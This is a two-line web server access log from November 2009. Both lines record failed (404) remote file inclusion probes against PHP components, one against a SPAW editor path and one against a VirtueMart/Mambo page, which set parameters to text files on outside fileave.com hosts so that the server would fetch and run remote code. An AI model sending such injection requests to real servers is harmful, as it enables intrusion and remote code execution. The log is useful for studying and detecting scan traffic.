122.155.5.84 - - [08/Nov/2009:22:49:37 -0800] "GET /logs/access_090810.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://let.fileave.com/set1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.46.2.21 - - [08/Nov/2009:22:49:42 -0800] "GET /logs/access_091012.log//index2.php?option=com_virtuemart&page&id=94&category_id=&mosConfig_absolute_path=http://katrok.fileave.com/a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
